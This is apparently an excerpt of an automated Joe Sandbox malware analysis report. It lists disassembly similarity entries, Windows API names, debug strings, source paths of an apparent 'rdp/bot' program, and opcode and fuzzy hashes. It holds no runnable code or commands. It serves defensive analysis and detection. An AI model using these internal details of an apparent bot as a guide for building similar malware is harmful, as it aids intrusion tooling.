                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                    • API String ID: 2018770650-4119452840
                                    • Opcode ID: 402f7a1f0eb8c196b54f707917abb0ee0b10649b0644a9a96accee421510c626
                                    • Instruction ID: 5089e44d84d0c2829170c8bfe102849cefd88ef90a6e2f20085dd10974a6e8d2
                                    • Opcode Fuzzy Hash: 402f7a1f0eb8c196b54f707917abb0ee0b10649b0644a9a96accee421510c626
                                    • Instruction Fuzzy Hash: 98311E55E8CA0B92F6E07746E450778AA914F81745ED60233C91EBB2F1ED3CE985A333
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                    • API String ID: 39653677-892027187
                                    • Opcode ID: b879f136bf3e73caf27cf456f8a81fbe1e6f740427478c846f9f963f1a0f41ab
                                    • Instruction ID: 9d105d4e32a15d8e5500c7678d2508dcc53e0644ad2f458c48668340ba2648ab
                                    • Opcode Fuzzy Hash: b879f136bf3e73caf27cf456f8a81fbe1e6f740427478c846f9f963f1a0f41ab
                                    • Instruction Fuzzy Hash: 9751E7B1A4915381FEA5BB57A9107B5AE907F00788FD44233D90DA72F0DE3EE591A322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen$strcat
                                    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                    • API String ID: 2335785903-2423714266
                                    • Opcode ID: 5f7ae23b154488ead1e5c0282a80bf8b4d26c10dc2c32ebd1ce7abcaca5ce085
                                    • Instruction ID: 510d08e9d32be8707bae8d6816a1c9ea6bebe24133c712ced9f6d31c207bbc98
                                    • Opcode Fuzzy Hash: 5f7ae23b154488ead1e5c0282a80bf8b4d26c10dc2c32ebd1ce7abcaca5ce085
                                    • Instruction Fuzzy Hash: F011B161A8866344FA91BF1698203B5AE815F01B88FCD5132DE4D6B3E2EE3CD4259362
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fwprintf$strlen
                                    • String ID: %*.*S$%-*.*S$%.*S
                                    • API String ID: 2636243462-2115465065
                                    • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                    • Instruction ID: c8ca68b2cdd47825e588860ec1c401d13a47dea0ee43a2d1d1506dd1dce3cabc
                                    • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                                    • Instruction Fuzzy Hash: 3731E572E8825245E7D0AA269800779EA90EB44BA4F84C233DD1DE77E5DE3CF4009722
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastLibraryLoadProc
                                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                    • API String ID: 3511525774-1584720945
                                    • Opcode ID: 433e6bd85099de35a889042718465d7b0be932ce001a7aa2f559248877877095
                                    • Instruction ID: 0c4329f581e03f6c4fafbfc67495ccf5af0b58af641e3a57ce460ca04e9b8431
                                    • Opcode Fuzzy Hash: 433e6bd85099de35a889042718465d7b0be932ce001a7aa2f559248877877095
                                    • Instruction Fuzzy Hash: 45110661E88603A0FBA1B716E8613B4AA906F10300FC45133C40DB62F1EE7DF566D723
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                    • API String ID: 1533789296-1853374401
                                    • Opcode ID: ebc399a167c55a4d9f19342e6aa133451176a90b2ab856515d1ba48be036be90
                                    • Instruction ID: 90f0c92e4d733732a1597bce939cda7f08c2efa243bbf817a266918d2a69e814
                                    • Opcode Fuzzy Hash: ebc399a167c55a4d9f19342e6aa133451176a90b2ab856515d1ba48be036be90
                                    • Instruction Fuzzy Hash: 9501C961A88543A1FBA1BB15E8613B49A906F04304FC44137C40DA62F2DF3DF5669322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                    • API String ID: 2962429428-1801624891
                                    • Opcode ID: 885e7699a94be3e9ff932faea847962a8a2fa01f4412b8f56f742292b50f105f
                                    • Instruction ID: 5f0281988732821e18be8cfb3468e0291ff4a560b99a4148ae265b3c30c841bc
                                    • Opcode Fuzzy Hash: 885e7699a94be3e9ff932faea847962a8a2fa01f4412b8f56f742292b50f105f
                                    • Instruction Fuzzy Hash: DAF05E65A8884A81EA40FB12EC207B89B60BF40344FC40133DA0D672F09E3CE957C311
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: DeviceErrorLastQuery
                                    • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                                    • API String ID: 963133057-3473575966
                                    • Opcode ID: 2e3eff2a2b5197cec1dcf2ae631c27a1d096b4f61c6a56b33ed9458329f13243
                                    • Instruction ID: 767a86b654f07bedbfbe3b509903ced1b70fec84ba05033d0bdd69a4ec004bee
                                    • Opcode Fuzzy Hash: 2e3eff2a2b5197cec1dcf2ae631c27a1d096b4f61c6a56b33ed9458329f13243
                                    • Instruction Fuzzy Hash: B541D232E8C55686FAB4761698503B8DA50AF40B54F950233DD5EB72E1DE3EECC0A363
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fwprintf
                                    • String ID: %*.*s$%-*.*s$%.*s$%S%S
                                    • API String ID: 968622242-2451587232
                                    • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                    • Instruction ID: 43a408a90ece63e549199cb37a58f157f5a1e41022df1e8e0a25a3d075cc77b8
                                    • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                                    • Instruction Fuzzy Hash: D931C672A4865345E7E0AA679804778EE90EF44B94F84C233D90DDB6E4DD3DF5109722
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CriticalDeleteSectionfclose
                                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                    • API String ID: 3387974148-4247581856
                                    • Opcode ID: 275ec92ee00db215cc1bcca50748eec47cfb9bfded2309289b8973e2e256f0ab
                                    • Instruction ID: 4fa17e1452e2b363d08995019ce1a27cbf5ae45f70bdc9c18ab181778ac391d3
                                    • Opcode Fuzzy Hash: 275ec92ee00db215cc1bcca50748eec47cfb9bfded2309289b8973e2e256f0ab
                                    • Instruction Fuzzy Hash: 96F0B22898960285FB84BB51E864370EAA0AF40304FC9A136C00E662F0CF3DE0659762
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,00007FF7E3CFA1E8,00000000,?,?,?,00007FF7E3CFA1E0,00007FF7E3CE1208,?,?,?,00007FF7E3CE1313), ref: 00007FF7E3CEABC2
                                    Strings
                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7E3CEAB5D
                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7E3CEAA62
                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF7E3CEAAEB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                    • API String ID: 544645111-1286557213
                                    • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                    • Instruction ID: c48cfb8f94da7e1a2020a12558226423cc65ab3e367a52887eb579c5a7210655
                                    • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                                    • Instruction Fuzzy Hash: D661D279F986428DEB90AB12D540378BBA1AB44794F849333D91CA37F5CE3CE550DB22
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorHandleLastModule
                                    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                    • API String ID: 4242514867-2427012484
                                    • Opcode ID: 38d7a92dea63755e6a28399a3a56b3c40770c0a548c9f0cb618223bc2397f0ac
                                    • Instruction ID: c837ab8d0bd941d8c2a2f523207476bcd287cd70ace891bef377a9459cd4d9fa
                                    • Opcode Fuzzy Hash: 38d7a92dea63755e6a28399a3a56b3c40770c0a548c9f0cb618223bc2397f0ac
                                    • Instruction Fuzzy Hash: 24F03025A4C60280E7A0BB55E4503B9ABA0EB44398FC44233C64D666F4CF3CD168D723
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Byte$CharMultiWide$Lead_errno
                                    • String ID:
                                    • API String ID: 2766522060-0
                                    • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                    • Instruction ID: e09f9aec0225da3d740b6092e26feb10058eab31a644f0102f5a332d1133c3ab
                                    • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                                    • Instruction Fuzzy Hash: 23312B71A4C29185F7B06F209460379EEE0AB85B88F448176DA8C637E5CF3DE4548722
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: signal
                                    • String ID: CCG
                                    • API String ID: 1946981877-1584390748
                                    • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                    • Instruction ID: 458cf56db16c69b5a6e06c980be5086118829eef7ffe437b6de4dd6c18a8389b
                                    • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                                    • Instruction Fuzzy Hash: D421D529E8C1124EFBE4325A8440338AD81AF44761F956B33C90EE62F1CD3DE8817123
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-3474627141
                                    • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                    • Instruction ID: 96c0234875d2ce45f0a595b4da24bf94ad5f266f8df1a243ba94fb34ddbc8694
                                    • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                    • Instruction Fuzzy Hash: 22117366808E8482D6519F1CE4413EAB7B0FF9A759F515326EBC826264DF3DD1668700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-2187435201
                                    • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                    • Instruction ID: 6dccbd2d94c75d2da0a002692bdcd21b90678a1bb1d61a9fc22240f86e661775
                                    • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                    • Instruction Fuzzy Hash: 58F06D66808F8482D211DF18E4402ABB7B0FF9E789F615327EBC936664DF3DD1528700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    • API String ID: 383729395-4273532761
                                    • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                    • Instruction ID: e5c55ca138fb288b85adf79a4ea97a0f1c38dbce905b3157c158650cfe6ec707
                                    • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                    • Instruction Fuzzy Hash: 92F06D66808F8482D251DF18E4002ABB7B0FF9E789F615327EBC936664DF3DD1528700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
